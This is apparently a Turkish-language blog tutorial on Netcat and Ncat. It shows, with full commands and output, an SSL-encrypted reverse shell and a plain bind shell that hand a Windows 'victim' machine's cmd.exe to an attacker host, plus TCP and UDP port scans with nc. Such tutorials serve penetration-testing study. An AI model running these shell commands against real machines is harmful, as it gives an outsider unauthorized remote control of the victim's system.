Netcat/Ncat Kullanımı

Netcat (nc), TCP veya UDP protokolünü kullanarak ağ bağlantıları üzerinden veri okuyan ve yazan basit bir Unix yardımcı programıdır. Bağlantıları açmak ve shelli ters çevirmek için kullanılabilir.

Ncat (ncat), netcat\’in çok gelişmiş yeniden uyarlamasıdır, her zaman ki gibi Nmap Projesidir. Ncat şifreleme desteği, IP kısıtlama, ağ üzerinden binary dosya yönetimi, yönlendirme ve proxy desteği ile birlikte gelir.

Windows\’tan saldırgan makineye şifreli reverse shell:

Saldırı makinesi:

$ ncat -vnl 9999 --allow 10.0.0.1 --ssl 
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 7B3E A579 1B50 C74C 35FE 7FD5 7D9D 991C 60D6 4F75
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999

Kurbanın makinesi:

C:\Users\Administrator\Desktop\Tools\ncat>ncat.exe --exec cmd.exe -vn 10.0.0.254 9999 --ssl
Ncat: Version 5.59BETA1 ( http://nmap.org/ncat )
Ncat: SSL connection to 10.0.0.254:9999.
Ncat: SHA-1 fingerprint: 7B3E A579 1B50 C74C 35FE 7FD5 7D9D 991C 60D6 4F75

Şifrelenmemiş bağlantı ile Windows\’tan saldırgan makineye bind shell

Kurbanın makinesi:

C:\Users\Administrator\Desktop\Tools\ncat>ncat.exe --exec cmd.exe -vnl 9999 --allow 10.0.0.254
Ncat: Version 5.59BETA1 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 10.0.0.254:35218.

Saldırı makinesi:

$ nc 10.0.0.1 9999
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Administrator\Desktop\Tools\ncat>

Nc ile port tarama

CONNECT TCP metodu:

$ nc -nvv -w 1 -z 192.168.0.1 3388-3390
192.168.0.1 3388 (cbserver): Connection refused
192.168.0.1 3389 (ms-wbt-server): Connection refused
192.168.0.1 3390 (dsc): Connection refused
Total received bytes: 0
Total sent bytes: 0

UDP Tarama:

$ nc -nvv -w 1 -z -u 192.168.0.1 160-162  
Total received bytes: 0
Total sent bytes: 0

Sistem Uzmanı, Linux Hacısı, El-Kernel

Yorum yapın